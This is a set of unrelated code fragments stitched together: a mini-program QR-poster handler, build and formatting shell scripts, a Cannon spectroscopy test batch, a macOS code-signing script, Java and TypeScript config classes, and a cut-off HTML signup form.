title: "正在保存图片",
mask: !1
}), getApp().core.downloadFile({
url: e.data.goods_qrcode,
success: function(t) {
getApp().core.showLoading({
title: "正在保存图片",
mask: !1
}), getApp().core.saveImageToPhotosAlbum({
filePath: t.tempFilePath,
success: function() {
getApp().core.showModal({
title: "提示",
content: "商品海报保存成功",
showCancel: !1
});
},
fail: function(t) {
getApp().core.showModal({
title: "图片保存失败",
content: t.errMsg,
showCancel: !1
});
},
complete: function(t) {
getApp().core.hideLoading();
}
});
},
fail: function(t) {
getApp().core.showModal({
title: "图片下载失败",
content: t.errMsg + ";" + e.data.goods_qrcode,
showCancel: !1
});
},
complete: function(t) {
getApp().core.hideLoading();
}
})) : getApp().core.showModal({
title: "提示",
content: "当前版本过低,无法使用该功能,请升级到最新版本后重试。",
showCancel: !1
});
}), _defineProperty(_Page, "goodsQrcodeClick", function(t) {
var e = t.currentTarget.dataset.src;
getApp().core.previewImage({
urls: [ e ]
});
}), _Page)); |
#!/bin/bash
set -v -e
for i in src/*.res* __tests__/*.res; do
./node_modules/.bin/bsc -format $i > $i.out
mv $i.out $i
done
|
<reponame>zolboo-gtn/stackoverflow_demo
import { Prisma, Role } from "@prisma/client";
import { IsEmail, IsNotEmpty, Matches } from "class-validator";
export class CreateUserDto
implements Pick<Prisma.UserCreateInput, "email" | "name" | "role">
{
@IsEmail()
readonly email: string;
readonly name?: string;
readonly role: Role;
@IsNotEmpty()
@Matches(/^(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{8,16}$/, {
message: "InvalidPasswordFormat",
})
readonly password: string;
}
|
package com.datafari.ranking.configuration;
import java.io.IOException;
import javax.inject.Inject;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.PropertySource;
import org.springframework.context.support.PropertySourcesPlaceholderConfigurer;
import com.datafari.ranking.training.ISolrClientProvider;
import com.datafari.ranking.training.ISparkContextProvider;
import com.datafari.ranking.training.SolrClientProviderImpl;
import com.datafari.ranking.training.SparkContextProviderImpl;
@Configuration
@ComponentScan("com.datafari.ranking")
@PropertySource("classpath:config.properties")
public class ConfigProperties {
@Value("${cassandraHost}")
private String cassandraHost;
@Value("${zkHost}")
private String zkHost;
@Value("${zkPort}")
private String zkPort;
@Inject
private ApplicationContext context;
@Bean
public ISparkContextProvider sparkContextProvider(){
return new SparkContextProviderImpl(cassandraHost);
}
@Bean
public ISolrClientProvider solrClientProvider() throws IOException{
return new SolrClientProviderImpl(context.getBean(ISparkContextProvider.class), zkHost, zkPort);
}
@Bean
public static PropertySourcesPlaceholderConfigurer propertySourcesPlaceholderConfigurer() {
return new PropertySourcesPlaceholderConfigurer();
}
} |
#!/bin/bash
# A little bit of scripting magic so that whatever directory this script is
# run from, we always find the python scripts and data we need.
cd "$(dirname "$0")"
cwd=`pwd`/..
cd ${cwd}
# Activate python virtual environment
source ../../../../virtualenv/bin/activate
# Now do some work
mkdir -p ../../../output_data/cannon
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ca/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_00"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ca/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_00"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ca/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_00"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ca/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_00"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Mg/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_01"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Mg/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_01"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Mg/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_01"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Mg/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_01"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ti/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_02"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ti/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_02"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ti/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_02"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ti/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_02"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Si/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_03"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Si/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_03"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Si/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_03"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Si/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_03"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Na/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_04"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Na/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_04"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Na/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_04"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Na/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_04"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ni/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_05"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ni/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_05"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ni/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_05"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ni/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_05"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Cr/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_06"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Cr/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_06"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Cr/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_06"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Cr/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_06"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ba/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_07"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ba/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_07"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ba/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_07"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Ba/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_07"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Eu/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_08"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Eu/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_08"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Eu/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_08"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Eu/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_08"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Li/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_09"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Li/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_09"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Li/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_09"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[Li/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_09"
# -----------------------------------------------------------------------------------------
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--description "4MOST HRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[C/H],[O/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_hrs_individual_10"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--description "4MOST LRS - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[C/H],[O/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_lrs_individual_10"
python3 cannon_test.py --train "galah_training_sample_4fs_hrs[SNR=250]" \
--test "galah_test_sample_4fs_hrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST HRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[C/H],[O/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_hrs_individual_10"
python3 cannon_test.py --train "galah_training_sample_4fs_lrs[SNR=250]" \
--test "galah_test_sample_4fs_lrs" \
--censor "line_list_filter_2016MNRAS.461.2174R.txt" \
--description "4MOST LRS (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
--labels "Teff,logg,[Fe/H],[C/H],[O/H]" \
--label-expressions "photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R" \
--output-file "../../../output_data/cannon/cannon_galah_censored_lrs_individual_10"
# -----------------------------------------------------------------------------------------
|
#!/bin/sh
set -e
ROOTDIR=dist
BUNDLE=${ROOTDIR}/ALMEX-Qt.app
CODESIGN=codesign
TEMPDIR=sign.temp
TEMPLIST=${TEMPDIR}/signatures.txt
OUT=signature.tar.gz
if [ ! -n "$1" ]; then
echo "usage: $0 <codesign args>"
echo "example: $0 -s MyIdentity"
exit 1
fi
rm -rf ${TEMPDIR} ${TEMPLIST}
mkdir -p ${TEMPDIR}
${CODESIGN} -f --file-list ${TEMPLIST} "$@" "${BUNDLE}"
for i in `grep -v CodeResources ${TEMPLIST}`; do
TARGETFILE="${BUNDLE}/`echo ${i} | sed "s|.*${BUNDLE}/||"`"
SIZE=`pagestuff $i -p | tail -2 | grep size | sed 's/[^0-9]*//g'`
OFFSET=`pagestuff $i -p | tail -2 | grep offset | sed 's/[^0-9]*//g'`
SIGNFILE="${TEMPDIR}/${TARGETFILE}.sign"
DIRNAME="`dirname ${SIGNFILE}`"
mkdir -p "${DIRNAME}"
echo "Adding detached signature for: ${TARGETFILE}. Size: ${SIZE}. Offset: ${OFFSET}"
dd if=$i of=${SIGNFILE} bs=1 skip=${OFFSET} count=${SIZE} 2>/dev/null
done
for i in `grep CodeResources ${TEMPLIST}`; do
TARGETFILE="${BUNDLE}/`echo ${i} | sed "s|.*${BUNDLE}/||"`"
RESOURCE="${TEMPDIR}/${TARGETFILE}"
DIRNAME="`dirname "${RESOURCE}"`"
mkdir -p "${DIRNAME}"
echo "Adding resource for: "${TARGETFILE}""
cp "${i}" "${RESOURCE}"
done
rm ${TEMPLIST}
tar -C ${TEMPDIR} -czf ${OUT} .
rm -rf ${TEMPDIR}
echo "Created ${OUT}"
|
#!/bin/bash
set -e # Exit with nonzero exit code if anything fails
rm -rf ./generated
mkdir -p ./generated/loaders
cp -rf ./src/content/loaders/ ./generated/loaders
mkdir -p ./generated/plugins
cp -rf ./src/content/plugins/ ./generated/plugins
fetchPackages() {
# Fetch webpack-contrib (and various other) loader repositories
node ./src/scripts/fetch_packages.js "webpack-contrib" "-loader" "README.md" "./generated/loaders"
node ./src/scripts/fetch_packages.js "babel" "babel-loader" "README.md" "./generated/loaders"
node ./src/scripts/fetch_packages.js "postcss" "postcss-loader" "README.md" "./generated/loaders"
node ./src/scripts/fetch_packages.js "peerigon" "extract-loader" "README.md" "./generated/loaders"
# Fetch webpack-contrib (and various other) plugin repositories
node ./src/scripts/fetch_packages.js "webpack-contrib" "-webpack-plugin" "README.md" "./generated/plugins"
node ./src/scripts/fetch_packages.js "webpack-contrib" "-extract-plugin" "README.md" "./generated/plugins"
# Remove deprecated or archived plugins repositories
rm ./generated/plugins/component-webpack-plugin.json ./generated/plugins/component-webpack-plugin.md
}
if [ "$TRAVIS_PULL_REQUEST" = "" ]; then
fetchPackages
else
echo "PR running, not fetching packages."
fi
# Fetch sponsors and backers from opencollective
node ./src/scripts/fetch_supporters.js
# Fetch starter kits
node ./src/scripts/fetch_starter_kits.js
|
<html>
<head>
<title>Signup Form</title>
</head>
<body>
<form action="/action_page.php">
<label for="username">Username:</label><br>
<input type="text" id="username" name="username" placeholder="Enter your username"><br>
<label for="email">Email:</label><br>
